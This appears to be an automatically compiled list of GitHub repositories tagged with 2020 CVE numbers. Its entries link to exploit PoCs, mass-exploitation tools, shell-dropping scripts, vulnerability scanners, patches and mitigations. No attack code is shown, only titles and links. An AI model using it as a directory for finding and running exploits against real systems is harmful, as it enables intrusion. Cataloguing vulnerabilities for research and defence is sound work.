**Cisco IP Phone 11.7 - Denial of Service (PoC)** : [abood05972/CVE-2020-3161](https://api.github.com/repos/abood05972/CVE-2020-3161) create time: 2020-12-31T15:37:48Z

** CVE-2020-35728 & Jackson-databind RCE** : [Al1ex/CVE-2020-35728](https://api.github.com/repos/Al1ex/CVE-2020-35728) create time: 2020-12-31T01:55:39Z

**None** : [M0NsTeRRR/CVE-2020-24033](https://api.github.com/repos/M0NsTeRRR/CVE-2020-24033) create time: 2020-07-13T00:25:58Z

**None** : [Rapidsafeguard/codesnippets_CVE-2020-8417](https://api.github.com/repos/Rapidsafeguard/codesnippets_CVE-2020-8417) create time: 2020-12-31T20:03:29Z

**None** : [PenTestical/CVE-2020-9484](https://api.github.com/repos/PenTestical/CVE-2020-9484) create time: 2020-12-31T21:54:50Z

**Showcase repository for CVE-2020-35717** : [hmartos/cve-2020-35717](https://api.github.com/repos/hmartos/cve-2020-35717) create time: 2021-01-01T08:53:53Z

**None** : [Udyz/CVE-2020-10148-Solarwinds-Orion](https://api.github.com/repos/Udyz/CVE-2020-10148-Solarwinds-Orion) create time: 2021-01-03T05:35:07Z

**CVE-2020–7961 Mass exploit for Script Kiddies** : [Udyz/CVE-2020-7961-Mass](https://api.github.com/repos/Udyz/CVE-2020-7961-Mass) create time: 2021-01-02T13:57:59Z

**zerologon script to exploit CVE-2020-1472 CVSS 10/10** : [wrathfulDiety/zerologon](https://api.github.com/repos/wrathfulDiety/zerologon) create time: 2021-01-01T07:38:58Z

**None** : [hybryx/CVE-2020-8165](https://api.github.com/repos/hybryx/CVE-2020-8165) create time: 2021-01-03T21:59:09Z

**integration examples for the CVE-2020-25860 fix** : [rauc/rauc-1.5-integration](https://api.github.com/repos/rauc/rauc-1.5-integration) create time: 2020-11-30T16:39:51Z

**Remote Code Execution on Microsoft Exchange Server through fixed cryptographic keys** : [MrTiz9/CVE-2020-0688](https://api.github.com/repos/MrTiz9/CVE-2020-0688) create time: 2021-01-04T10:48:40Z

**Todos los materiales necesarios para la PoC en Chrome y ftview** : [Marmeus/CVE-2020-15999](https://api.github.com/repos/Marmeus/CVE-2020-15999) create time: 2020-12-30T19:58:33Z

**Scanner for Zyxel products which are potentially vulnerable due to an undocumented user account (CVE-2020-29583)** : [2d4d/scan_CVE-2020-29583](https://api.github.com/repos/2d4d/scan_CVE-2020-29583) create time: 2021-01-04T00:56:55Z

**None** : [dennyson120/CVE-2020-27955](https://api.github.com/repos/dennyson120/CVE-2020-27955) create time: 2021-01-05T08:13:13Z

**SolarWinds Orion API 远程代码执行漏洞批量检测脚本** : [B1anda0/CVE-2020-10148](https://api.github.com/repos/B1anda0/CVE-2020-10148) create time: 2021-01-05T13:42:36Z

**Cross Site Scripting (XSS) in Digisol DG-HR3400 Router** : [the-girl-who-lived/CVE-2020-35262](https://api.github.com/repos/the-girl-who-lived/CVE-2020-35262) create time: 2021-01-05T19:32:31Z

**Stored XSS via CSRF in Beetel 777VR1 Router ** : [the-girl-who-lived/CVE-2020-25498](https://api.github.com/repos/the-girl-who-lived/CVE-2020-25498) create time: 2021-01-05T17:38:52Z

**None** : [asc0t6e/cve-2020-test](https://api.github.com/repos/asc0t6e/cve-2020-test) create time: 2020-04-26T14:23:16Z

**PoC of HTTP Request Smuggling in nodejs (CVE-2020-8287)** : [progfay/nodejs-http-transfer-encoding-smuggling-poc](https://api.github.com/repos/progfay/nodejs-http-transfer-encoding-smuggling-poc) create time: 2021-01-05T02:09:23Z

**CVE-2020-1937** : [shanika04/apache_kylin](https://api.github.com/repos/shanika04/apache_kylin) create time: 2021-01-06T13:31:20Z

**None** : [QmF0c3UK/CVE-2020-17518](https://api.github.com/repos/QmF0c3UK/CVE-2020-17518) create time: 2021-01-06T13:40:06Z

**None** : [QmF0c3UK/CVE-2020-17519](https://api.github.com/repos/QmF0c3UK/CVE-2020-17519) create time: 2021-01-06T13:41:24Z

**CVE-2020-9483 OR CVE-2020-13921** : [shanika04/apache_skywalking](https://api.github.com/repos/shanika04/apache_skywalking) create time: 2021-01-06T13:22:32Z

**None** : [kurenaif/CVE-2020-28052_PoC](https://api.github.com/repos/kurenaif/CVE-2020-28052_PoC) create time: 2021-01-04T17:13:39Z

**Apache Flink Directory Traversal (CVE-2020-17519) Nmap NSE Script** : [dolevf/apache-flink-directory-traversal.nse](https://api.github.com/repos/dolevf/apache-flink-directory-traversal.nse) create time: 2021-01-06T16:03:06Z

**Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)** : [B1anda0/CVE-2020-17519](https://api.github.com/repos/B1anda0/CVE-2020-17519) create time: 2021-01-06T02:15:39Z

**An updated version of get-pixels that patches the CVE-2020-8175 security issue.** : [sysollie/get-pixels-updated](https://api.github.com/repos/sysollie/get-pixels-updated) create time: 2021-01-07T09:31:26Z

**An updated version of save-pixels that patches the CVE-2020-8175 security issue.** : [sysollie/save-pixels-updated](https://api.github.com/repos/sysollie/save-pixels-updated) create time: 2021-01-07T10:41:09Z

**None** : [uzzzval/CVE-2020-17530](https://api.github.com/repos/uzzzval/CVE-2020-17530) create time: 2021-01-07T14:24:08Z

**POC to run system component in an untrusted-app process** : [Zachinio/CVE-2020-0001](https://api.github.com/repos/Zachinio/CVE-2020-0001) create time: 2021-01-06T18:51:19Z

**quick'n'dirty automated checks for potential exploitation of CVE-2020-1472 (aka ZeroLogon), using leading artifects in determining an actual exploitation of CVE-2020-1472. requires admin access to the DCs** : [YossiSassi/ZeroLogon-Exploitation-Check](https://api.github.com/repos/YossiSassi/ZeroLogon-Exploitation-Check) create time: 2021-01-07T21:35:16Z

**TikiWiki 21.2 allows to edit templates without the use of a CSRF protection. ** : [S1lkys/CVE-2020-29254](https://api.github.com/repos/S1lkys/CVE-2020-29254) create time: 2020-12-10T18:13:47Z

**None** : [ElmouradiAmine/CVE-2020-7048](https://api.github.com/repos/ElmouradiAmine/CVE-2020-7048) create time: 2021-01-09T13:52:09Z

**None** : [GuillaumePetit84/CVE-2020-35488](https://api.github.com/repos/GuillaumePetit84/CVE-2020-35488) create time: 2020-12-15T17:55:07Z

**[CVE-2020-17518] Apache Flink RESTful API Arbitrary File Upload via Directory Traversal** : [murataydemir/CVE-2020-17518](https://api.github.com/repos/murataydemir/CVE-2020-17518) create time: 2021-01-10T01:12:45Z

**[CVE-2020-17519] Apache Flink RESTful API Arbitrary File Read** : [murataydemir/CVE-2020-17519](https://api.github.com/repos/murataydemir/CVE-2020-17519) create time: 2021-01-10T01:24:50Z

**CVE-2020-36179~82 Jackson-databind SSRF&RCE** : [Al1ex/CVE-2020-36179](https://api.github.com/repos/Al1ex/CVE-2020-36179) create time: 2021-01-10T06:47:49Z

**CISCO CVE-2020-3452 Scanner & Exploiter** : [darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter](https://api.github.com/repos/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter) create time: 2021-01-05T14:41:13Z

**Spring 安全漏洞 CVE-2020-5421复现 ** : [pandaMingx/CVE-2020-5421](https://api.github.com/repos/pandaMingx/CVE-2020-5421) create time: 2021-01-10T12:26:00Z

**CVE-2020-2978** : [emad-almousa/CVE-2020-2978](https://api.github.com/repos/emad-almousa/CVE-2020-2978) create time: 2020-12-18T06:56:51Z

**CVE-2020-17519** : [hoanx4/CVE-2020-17519](https://api.github.com/repos/hoanx4/CVE-2020-17519) create time: 2021-01-08T06:50:59Z

**local exploit** : [ORCA666/CVE-2020-0796](https://api.github.com/repos/ORCA666/CVE-2020-0796) create time: 2021-01-11T04:48:26Z

**CVE-2020-36184 && Jackson-databind RCE** : [Al1ex/CVE-2020-36184](https://api.github.com/repos/Al1ex/CVE-2020-36184) create time: 2021-01-11T06:22:25Z

**CVE-2020-36188 &&Jackson-databind RCE** : [Al1ex/CVE-2020-36188](https://api.github.com/repos/Al1ex/CVE-2020-36188) create time: 2021-01-11T06:29:38Z

**PoC for CVE-2020-16012, a timing side channel in drawImage in Firefox & Chrome** : [aleksejspopovs/cve-2020-16012](https://api.github.com/repos/aleksejspopovs/cve-2020-16012) create time: 2020-11-14T21:32:15Z

**Apache Unomi CVE-2020-13942: RCE Vulnerabilities** : [hoanx4/apche_unomi_rce](https://api.github.com/repos/hoanx4/apche_unomi_rce) create time: 2021-01-11T15:50:27Z

**利用Apache Flink CVE-2020-17518 getshell** : [rakjong/Flink-CVE-2020-17518-getshell](https://api.github.com/repos/rakjong/Flink-CVE-2020-17518-getshell) create time: 2021-01-10T15:06:40Z

**Proof of concept for CVE-2020-15257 in containerd.** : [nccgroup/abstractshimmer](https://api.github.com/repos/nccgroup/abstractshimmer) create time: 2020-12-07T08:47:09Z

**Git-lfs RCE exploit CVE-2020-27955 - tested on Windows on: git, gh cli, GitHub Desktop, Visual Studio, SourceTree etc.** : [ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955](https://api.github.com/repos/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955) create time: 2020-11-03T17:14:22Z

**CVE-2020-17519 EXP** : [radbsie/CVE-2020-17519-Exp](https://api.github.com/repos/radbsie/CVE-2020-17519-Exp) create time: 2021-01-14T10:45:29Z

**2020一些漏洞** : [r0eXpeR/CVE-2020](https://api.github.com/repos/r0eXpeR/CVE-2020) create time: 2021-01-03T13:04:52Z

**None** : [AssassinUKG/CVE-2020-8165](https://api.github.com/repos/AssassinUKG/CVE-2020-8165) create time: 2021-01-15T04:40:24Z

**Apache Kylin API未授权访问漏洞;CVE-2020-13937;Apache Kylin漏洞** : [yaunsky/CVE-2020-13937](https://api.github.com/repos/yaunsky/CVE-2020-13937) create time: 2021-01-15T08:57:09Z

**CVE-2020-14882** : [securitysqs/poc](https://api.github.com/repos/securitysqs/poc) create time: 2021-01-15T09:44:35Z

**Exploit script for CVE-2020-7961** : [ShutdownRepo/CVE-2020-7961](https://api.github.com/repos/ShutdownRepo/CVE-2020-7961) create time: 2021-01-14T19:18:13Z

**Zero-Day Vulnerability in File Manager Plugin 6.7 ( CVE 2020-25213 )** : [aron-tn/0day-elFinder-2020](https://api.github.com/repos/aron-tn/0day-elFinder-2020) create time: 2020-09-11T08:56:56Z

**PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager)** : [chipik/SAP_EEM_CVE-2020-6207](https://api.github.com/repos/chipik/SAP_EEM_CVE-2020-6207) create time: 2021-01-14T10:49:40Z

**Apache Tomcat RCE (CVE-2020-9484)** : [X-x-X-0/-CVE-2020-9484-](https://api.github.com/repos/X-x-X-0/-CVE-2020-9484-) create time: 2021-01-15T17:59:25Z

**Apache Tomcat RCE (CVE-2020-9484)** : [X-x-X-0/-CVE-2020-9484](https://api.github.com/repos/X-x-X-0/-CVE-2020-9484) create time: 2021-01-15T17:59:50Z

**SMBGhost (CVE-2020-0796) Automate Exploitation and Detection** : [Barriuso/SMBGhost_AutomateExploitation](https://api.github.com/repos/Barriuso/SMBGhost_AutomateExploitation) create time: 2020-06-10T16:44:39Z

**CVE-2020-7200: HPE Systems Insight Manager (SIM) RCE PoC** : [alexfrancow/CVE-2020-7200](https://api.github.com/repos/alexfrancow/CVE-2020-7200) create time: 2021-01-14T21:05:29Z

**CVE-2020-14179 Scanner** : [c0brabaghdad1/CVE-2020-14179](https://api.github.com/repos/c0brabaghdad1/CVE-2020-14179) create time: 2021-01-08T14:15:24Z

**CVE-2020-17519; Apache Flink 任意文件读取; 批量检测** : [yaunsky/CVE-2020-17519-Apache-Flink](https://api.github.com/repos/yaunsky/CVE-2020-17519-Apache-Flink) create time: 2021-01-18T02:03:05Z

**CVE-2020-10673:jackson-databind RCE** : [Al1ex/CVE-2020-10673](https://api.github.com/repos/Al1ex/CVE-2020-10673) create time: 2020-05-21T14:56:30Z

**This is a simple test for FasterXML jackson-databind** : [Al1ex/CVE-2020-14195](https://api.github.com/repos/Al1ex/CVE-2020-14195) create time: 2020-05-26T15:11:03Z

**PoC for CVE-2020-8165** : [progfay/CVE-2020-8165](https://api.github.com/repos/progfay/CVE-2020-8165) create time: 2021-01-15T07:31:21Z

**CVE-2020-17456 & Seowon SLC 130 Router RCE** : [Al1ex/CVE-2020-17456](https://api.github.com/repos/Al1ex/CVE-2020-17456) create time: 2021-01-21T06:16:40Z

**CVE-2020-35713** : [Al1ex/CVE-2020-35713](https://api.github.com/repos/Al1ex/CVE-2020-35713) create time: 2021-01-21T06:39:58Z

**None** : [jet-pentest/CVE-2020-24032](https://api.github.com/repos/jet-pentest/CVE-2020-24032) create time: 2021-01-21T08:07:09Z

**CVE-2020-28874** : [varandinawer/CVE-2020-28874](https://api.github.com/repos/varandinawer/CVE-2020-28874) create time: 2021-01-21T13:11:30Z

**None** : [zeromirror/cve_2020-11060](https://api.github.com/repos/zeromirror/cve_2020-11060) create time: 2021-01-22T04:07:47Z

**Apache Kylin API Unauthorized Access** : [Al1ex/CVE-2020-13937](https://api.github.com/repos/Al1ex/CVE-2020-13937) create time: 2021-01-22T06:53:34Z

**CVE-2020-26258 && XStream SSRF** : [Al1ex/CVE-2020-26258](https://api.github.com/repos/Al1ex/CVE-2020-26258) create time: 2021-01-22T08:44:24Z

**2020l4web-campaign-DanCvejn created by GitHub Classroom** : [pslib-cz/2020l4web-campaign-DanCvejn](https://api.github.com/repos/pslib-cz/2020l4web-campaign-DanCvejn) create time: 2021-01-08T08:03:47Z

**CVE-2020-26259 &&XStream Arbitrary File Delete** : [Al1ex/CVE-2020-26259](https://api.github.com/repos/Al1ex/CVE-2020-26259) create time: 2021-01-22T09:23:28Z

**CVE-2020-26217 && XStream RCE** : [Al1ex/CVE-2020-26217](https://api.github.com/repos/Al1ex/CVE-2020-26217) create time: 2021-01-22T09:56:11Z

**None** : [Dviejopomata/CVE-2020-8554](https://api.github.com/repos/Dviejopomata/CVE-2020-8554) create time: 2021-01-21T22:41:50Z

**GitLab 12.9 Arbitrary File Read** : [VoxelNaut/cve-2020-10977](https://api.github.com/repos/VoxelNaut/cve-2020-10977) create time: 2021-01-23T18:21:27Z

**None** : [killmonday/CVE-2020-17530-s2-061](https://api.github.com/repos/killmonday/CVE-2020-17530-s2-061) create time: 2021-01-24T07:51:31Z

**DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)** : [knqyf263/dnspooq](https://api.github.com/repos/knqyf263/dnspooq) create time: 2021-01-23T19:07:18Z

**Remote Code Execution vulnerability on ArcSight Logger** : [ch1nghz/CVE-2020-11851](https://api.github.com/repos/ch1nghz/CVE-2020-11851) create time: 2021-01-07T12:30:23Z

**CVE-2020-8597 in RM2100** : [lakwsh/CVE-2020-8597](https://api.github.com/repos/lakwsh/CVE-2020-8597) create time: 2021-01-24T15:28:00Z

**CodeTest信息收集和漏洞利用工具,可在进行渗透测试之时方便利用相关信息收集脚本进行信息的获取和验证工作,漏洞利用模块可选择需要测试的漏洞模块,或者选择所有模块测试,包含CVE-2020-14882, CVE-2020-2555等,可自己收集脚本后按照模板进行修改。** : [xkx518/CodeTest](https://api.github.com/repos/xkx518/CodeTest) create time: 2020-12-29T09:11:31Z

**This is a simple test for Jackson** : [Al1ex/CVE-2020-24750](https://api.github.com/repos/Al1ex/CVE-2020-24750) create time: 2020-05-27T13:42:11Z

**Denial of Service (DoS) - jQuery UI 1.12.1 - Exploit** : [rafaelcintralopes/CVE-2020-28488](https://api.github.com/repos/rafaelcintralopes/CVE-2020-28488) create time: 2021-01-25T12:39:14Z

**用于对WebLogic(10.3.6.0.0 ;12.1.3.0.0 ;12.2.1.3.0; 12.2.1.4.0 ;14.1.1.0.0)进行验证及利用** : [fan1029/CVE-2020-14883EXP](https://api.github.com/repos/fan1029/CVE-2020-14883EXP) create time: 2021-01-25T15:33:04Z

**Disclosure of Accfly camera vulnerabilities: CVE-2020-25782, CVE-2020-25783, CVE-2020-25784, CVE-2020-25785.** : [tezeb/accfly](https://api.github.com/repos/tezeb/accfly) create time: 2021-01-26T15:48:27Z

**None** : [dpredrag/CVE-2020-8840](https://api.github.com/repos/dpredrag/CVE-2020-8840) create time: 2021-01-26T19:10:22Z

**WebLogic T3/IIOP RCE ExternalizableHelper.class of coherence.jar** : [Y4er/CVE-2020-14756](https://api.github.com/repos/Y4er/CVE-2020-14756) create time: 2021-01-27T01:24:52Z

**CVE-2020-14882部署冰蝎内存马** : [ShmilySec/CVE-2020-14882](https://api.github.com/repos/ShmilySec/CVE-2020-14882) create time: 2021-01-27T06:29:52Z

**Tester for a vulnerability CVE-2020-15227 found in nette/application and nette/nette** : [VottusCode/cve-2020-15227](https://api.github.com/repos/VottusCode/cve-2020-15227) create time: 2021-01-28T10:50:52Z

**SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 Directory Indexing Vulnerability** : [swzhouu/CVE-2020-27368](https://api.github.com/repos/swzhouu/CVE-2020-27368) create time: 2021-01-15T05:08:13Z

**SKYWORTH GN542VF Hardware Version 2.0 and Software Version 2.0.0.16 Cross Site Scripting (XSS) Vulnerability** : [swzhouu/CVE-2020-26733](https://api.github.com/repos/swzhouu/CVE-2020-26733) create time: 2021-01-14T10:03:14Z

**Skyworth GN542VF Boa version 0.94.13 does not set the Secure flag for the session cookie in an HTTPS session** : [swzhouu/CVE-2020-26732](https://api.github.com/repos/swzhouu/CVE-2020-26732) create time: 2021-01-14T09:55:59Z

**None** : [pwn3z/CVE-2020-14882-WebLogic](https://api.github.com/repos/pwn3z/CVE-2020-14882-WebLogic) create time: 2021-01-29T13:12:40Z

**A (wanted to be) better script than what can be found on exploit-db about the authenticated arbitrary read file on GitLab v12.9.0 (CVE-2020-10977)** : [erk3/gitlab-12.9.0-file-read](https://api.github.com/repos/erk3/gitlab-12.9.0-file-read) create time: 2021-01-29T16:17:10Z

**Modified version of auxiliary/admin/http/tomcat_ghostcat, it can Read any file** : [YU5Z8X2CvH1fv4ep/CVE-2020-1938-MSF-MODULE](https://api.github.com/repos/YU5Z8X2CvH1fv4ep/CVE-2020-1938-MSF-MODULE) create time: 2021-02-01T01:59:17Z

**This vulnerability exists in OpenBSD’s mail server OpenSMTPD’s “smtp_mailaddr()” function, and affects OpenBSD version 6.6. This allows an attacker to execute arbitrary shell commands like “sleep 66” as root user** : [jopraveen/CVE-2020-7247](https://api.github.com/repos/jopraveen/CVE-2020-7247) create time: 2021-02-01T13:01:21Z

**Pyrescom Termod proof-of-concept code for CVE-2020-23160, CVE-2020-23161 and CVE-2020-23162** : [Outpost24/Pyrescom-Termod-PoC](https://api.github.com/repos/Outpost24/Pyrescom-Termod-PoC) create time: 2021-01-25T14:17:35Z

**my exp for CVE-2020-27194, tested on linux kernel 5.8.14.** : [xmzyshypnc/CVE-2020-27194](https://api.github.com/repos/xmzyshypnc/CVE-2020-27194) create time: 2020-11-09T11:58:34Z

**CVE-2020-3452 - Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) traversal** : [fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal](https://api.github.com/repos/fuzzlove/Cisco-ASA-FTD-Web-Services-Traversal) create time: 2021-02-03T05:45:53Z

**CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756、CVE-2021-2109** : [somatrasss/weblogic2021](https://api.github.com/repos/somatrasss/weblogic2021) create time: 2021-02-04T07:03:56Z

**simple bash script of CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability checker ** : [faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner](https://api.github.com/repos/faisalfs10x/Cisco-CVE-2020-3452-shodan-scanner) create time: 2021-02-04T16:50:27Z

**simple bash script of F5 BIG-IP TMUI Vulnerability CVE-2020-5902 checker** : [faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner](https://api.github.com/repos/faisalfs10x/F5-BIG-IP-CVE-2020-5902-shodan-scanner) create time: 2021-02-04T16:36:21Z

**CVE-2020-3992 & CVE-2019-5544** : [dgh05t/VMware_ESXI_OpenSLP_PoCs](https://api.github.com/repos/dgh05t/VMware_ESXI_OpenSLP_PoCs) create time: 2021-02-04T15:15:22Z

**Poc for CVE-2020-14181** : [bk-rao/CVE-2020-14181](https://api.github.com/repos/bk-rao/CVE-2020-14181) create time: 2021-02-05T07:48:19Z

**Mitigate CVE-2020-8554 with Policy Controller in Anthos** : [jrmurray000/CVE-2020-8554](https://api.github.com/repos/jrmurray000/CVE-2020-8554) create time: 2020-12-11T17:40:47Z

**shiro-cve-2020-17523 漏洞的两种绕过姿势分析(带漏洞环境)** : [jweny/shiro-cve-2020-17523](https://api.github.com/repos/jweny/shiro-cve-2020-17523) create time: 2021-02-03T08:14:03Z

**Apple Safari Remote Code Execution** : [FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930](https://api.github.com/repos/FunPhishing/Apple-Safari-Remote-Code-Execution-CVE-2020-27930) create time: 2021-02-07T11:28:21Z

**CVE-2020-7384** : [nikhil1232/CVE-2020-7384](https://api.github.com/repos/nikhil1232/CVE-2020-7384) create time: 2021-02-07T16:00:41Z

**None** : [forse01/CVE-2020-17527-Tomcat](https://api.github.com/repos/forse01/CVE-2020-17527-Tomcat) create time: 2021-02-05T00:18:45Z

**None** : [forse01/CVE-2020-11990-Cordova](https://api.github.com/repos/forse01/CVE-2020-11990-Cordova) create time: 2021-02-04T06:22:06Z

**HoneyPoC: Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2000 up to Windows Server 2019.** : [ZephrFish/CVE-2020-1350](https://api.github.com/repos/ZephrFish/CVE-2020-1350) create time: 2020-07-14T19:02:25Z

**None** : [alebedev87/gatekeeper-cve-2020-8554](https://api.github.com/repos/alebedev87/gatekeeper-cve-2020-8554) create time: 2021-02-09T21:29:44Z

**None** : [TheCyberGeek/CVE-2020-5844](https://api.github.com/repos/TheCyberGeek/CVE-2020-5844) create time: 2020-01-29T23:11:46Z

**CVE-2020-12688 - Authenticated RCE Centreon 20.04** : [TheCyberGeek/Centreon-20.04](https://api.github.com/repos/TheCyberGeek/Centreon-20.04) create time: 2020-04-30T21:59:52Z

**None** : [AssassinUKG/CVE-2020-9484](https://api.github.com/repos/AssassinUKG/CVE-2020-9484) create time: 2021-01-26T22:51:30Z

**Test script for CVE-2020-1472 for both RPC/TCP and RPC/SMB** : [zeronetworks/zerologon](https://api.github.com/repos/zeronetworks/zerologon) create time: 2020-09-17T16:53:17Z

**None** : [TechnoHT/CVE-2020-0041](https://api.github.com/repos/TechnoHT/CVE-2020-0041) create time: 2021-02-10T05:42:26Z

**POC for CVE-2020-9484** : [VICXOR/CVE-2020-9484](https://api.github.com/repos/VICXOR/CVE-2020-9484) create time: 2021-02-10T16:27:07Z

**None** : [azizalshammari/CVE-2020-36079.](https://api.github.com/repos/azizalshammari/CVE-2020-36079.) create time: 2021-02-10T17:21:10Z

**Flag the cve-2020-35498 attack** : [freddierice/cve-2020-35498-flag](https://api.github.com/repos/freddierice/cve-2020-35498-flag) create time: 2021-02-12T02:08:01Z

**Early 2019 - late 2020. R.I.P. CVE-2020-12928 https://h0mbre.github.io/RyzenMaster_CVE/#** : [ekknod/EC_PRO-LAN](https://api.github.com/repos/ekknod/EC_PRO-LAN) create time: 2020-11-10T13:08:21Z

**Regular expression matching for URL's. Maintained, safe, and browser-friendly version of url-regex. Resolves CVE-2020-7661 for Node.js servers.** : [niftylettuce/url-regex-safe](https://api.github.com/repos/niftylettuce/url-regex-safe) create time: 2020-08-15T07:42:50Z

**CVE-2020-14210** : [monitorapp-aicc/report](https://api.github.com/repos/monitorapp-aicc/report) create time: 2021-02-15T05:08:22Z

**PoC DoS CVE-2020-36109** : [tin-z/CVE-2020-36109-POC](https://api.github.com/repos/tin-z/CVE-2020-36109-POC) create time: 2021-02-13T16:03:36Z

**None** : [danielklim/cve-2020-8165-demo](https://api.github.com/repos/danielklim/cve-2020-8165-demo) create time: 2021-02-14T06:57:30Z

**OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution PoC exploit** : [QTranspose/CVE-2020-7247-exploit](https://api.github.com/repos/QTranspose/CVE-2020-7247-exploit) create time: 2021-02-13T06:57:47Z

**None** : [j4nn/CVE-2020-0041](https://api.github.com/repos/j4nn/CVE-2020-0041) create time: 2020-08-10T21:34:16Z

**CSRF Code snippet vulnerability CVE-2020-8417** : [Vulnmachines/WordPress_CVE-2020-8417](https://api.github.com/repos/Vulnmachines/WordPress_CVE-2020-8417) create time: 2021-02-19T20:37:23Z

**Spring Cloud Config 目录穿越漏洞(CVE-2020-5410) 复现** : [thelostworldFree/SpringCloud-Config-CVE-2020-5410](https://api.github.com/repos/thelostworldFree/SpringCloud-Config-CVE-2020-5410) create time: 2021-02-20T08:05:51Z

**None** : [klinix5/CVE-2020-0814](https://api.github.com/repos/klinix5/CVE-2020-0814) create time: 2020-04-07T01:17:32Z

**None** : [DXY0411/CVE-2020-8637](https://api.github.com/repos/DXY0411/CVE-2020-8637) create time: 2021-02-15T06:38:35Z

**This repo contains a proof-of-concept for 📱🚀👑⚡, a deserialization vuln for local escalation of privilege to system_server in Android 10. This proof-of-concept only activates a privileged intent.** : [0x742/CVE-2020-0082-ExternalVibration](https://api.github.com/repos/0x742/CVE-2020-0082-ExternalVibration) create time: 2021-02-23T14:00:55Z

**None** : [lsw29475/CVE-2020-0022](https://api.github.com/repos/lsw29475/CVE-2020-0022) create time: 2021-02-24T13:17:41Z

**eWeLinkESPT is a tool that automatically decodes and decrypts the WiFi network credentials transmitted to a supported ESP-based IoT device by the eWeLink mobile application. (CVE-2020-12702)** : [salgio/ESPTouchCatcher](https://api.github.com/repos/salgio/ESPTouchCatcher) create time: 2020-01-11T13:15:53Z

**CVE-2020-11890: Improper input validations in the usergroup table class could lead to a broken ACL configuration to RCE** : [HoangKien1020/CVE-2020-11890](https://api.github.com/repos/HoangKien1020/CVE-2020-11890) create time: 2020-04-22T06:42:50Z

**None** : [lsw29475/CVE-2020-17057](https://api.github.com/repos/lsw29475/CVE-2020-17057) create time: 2021-02-24T13:19:44Z

**NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972** : [psc4re/NSE-scripts](https://api.github.com/repos/psc4re/NSE-scripts) create time: 2020-03-11T17:51:29Z

**CVE-2020-27199** : [9lyph/CVE-2020-27199](https://api.github.com/repos/9lyph/CVE-2020-27199) create time: 2020-07-06T03:10:34Z

**vue-storefront-api** : [0ndras3k/CVE-2020-11883](https://api.github.com/repos/0ndras3k/CVE-2020-11883) create time: 2021-02-28T23:26:22Z

**CVE-2020-14882** : [milo2012/CVE-2020-14882](https://api.github.com/repos/milo2012/CVE-2020-14882) create time: 2021-02-25T12:57:08Z

**Modified the test PoC from Secura, CVE-2020-1472, to change the machine password to null** : [hell-moon/ZeroLogon-Exploit](https://api.github.com/repos/hell-moon/ZeroLogon-Exploit) create time: 2021-03-01T04:21:47Z

**None** : [synacktiv/CVE-2021-27246_Pwn2Own2020](https://api.github.com/repos/synacktiv/CVE-2021-27246_Pwn2Own2020) create time: 2021-03-01T16:45:42Z

**None** : [lb0x/cve-2020-24572](https://api.github.com/repos/lb0x/cve-2020-24572) create time: 2020-08-23T06:58:04Z

**Directory traversal in com_media to RCE** : [HoangKien1020/CVE-2020-24597](https://api.github.com/repos/HoangKien1020/CVE-2020-24597) create time: 2020-08-26T02:31:21Z

**CVE-2020-28243 Local Privledge Escalation Exploit in SaltStack Minion** : [stealthcopter/CVE-2020-28243](https://api.github.com/repos/stealthcopter/CVE-2020-28243) create time: 2020-12-22T19:35:15Z

**None** : [lorsanta/exploit-CVE-2020-28926](https://api.github.com/repos/lorsanta/exploit-CVE-2020-28926) create time: 2021-03-03T21:06:56Z

**SD-91948: CVE-2020-35682: Authentication Bypass Vulnerability during SAML login in ServiceDesk Plus.** : [its-arun/CVE-2020-35682](https://api.github.com/repos/its-arun/CVE-2020-35682) create time: 2021-03-04T12:43:01Z

**None** : [forse01/CVE-2020-25213-Wordpress](https://api.github.com/repos/forse01/CVE-2020-25213-Wordpress) create time: 2021-02-04T04:52:06Z

**None** : [ret2hell/CVE-2020-8835](https://api.github.com/repos/ret2hell/CVE-2020-8835) create time: 2020-09-16T19:38:43Z

**Poc for CVE-2020-12255** : [vishwaraj101/CVE-2020-12255](https://api.github.com/repos/vishwaraj101/CVE-2020-12255) create time: 2021-03-06T20:28:43Z

**None** : [xyddnljydd/cve-2020-1066](https://api.github.com/repos/xyddnljydd/cve-2020-1066) create time: 2021-03-07T06:55:26Z

**Gitlab v12.4.0-8.1 RCE** : [Liath/CVE-2020-10977](https://api.github.com/repos/Liath/CVE-2020-10977) create time: 2021-03-07T07:26:38Z

**MS CVE 2020-0796 SMB** : [Kinesys/Kinesys-CVE-2020-0796](https://api.github.com/repos/Kinesys/Kinesys-CVE-2020-0796) create time: 2021-03-07T17:24:42Z

**None** : [DXY0411/CVE-2020-9484](https://api.github.com/repos/DXY0411/CVE-2020-9484) create time: 2021-03-01T11:16:04Z

**NOTICE This repository contains the public FTC SDK for the SKYSTONE (2019-2020) competition season. If you are looking for the current season's FTC SDK software, please visit the new and permanent home of the public FTC SDK: FtcRobotController repository Welcome! This GitHub repository contains the source code that is used to build an Android app to control a FIRST Tech Challenge competition robot. To use this SDK, download/clone the entire project to your local computer. Getting Started If you are new to robotics or new to the FIRST Tech Challenge, then you should consider reviewing the FTC Blocks Tutorial to get familiar with how to use the control system: FTC Blocks Online Tutorial Even if you are an advanced Java programmer, it is helpful to start with the FTC Blocks tutorial, and then migrate to the OnBot Java Tool or to Android Studio afterwards. Downloading the Project If you are an Android Studio programmer, there are several ways to download this repo. Note that if you use the Blocks or OnBot Java Tool to program your robot, then you do not need to download this repository. If you are a git user, 